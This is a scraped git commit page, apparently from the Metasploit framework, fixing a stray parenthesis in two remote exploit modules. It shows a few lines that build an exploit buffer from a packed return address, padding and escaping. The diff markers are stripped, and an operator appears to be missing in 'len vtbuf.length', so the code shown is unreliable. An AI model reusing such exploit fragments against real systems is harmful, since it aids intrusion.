fix typo
git-svn-id: file:///home/svn/framework3/trunk@8189 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ab1a1c58db
commit
9cb3ac9340
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len vtbuf.length))
|
||||
vtbuf << rand_text_alpha(len vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
|
|
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len vtbuf.length))
|
||||
vtbuf << rand_text_alpha(len vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
|
|
Loading…
Reference in New Issue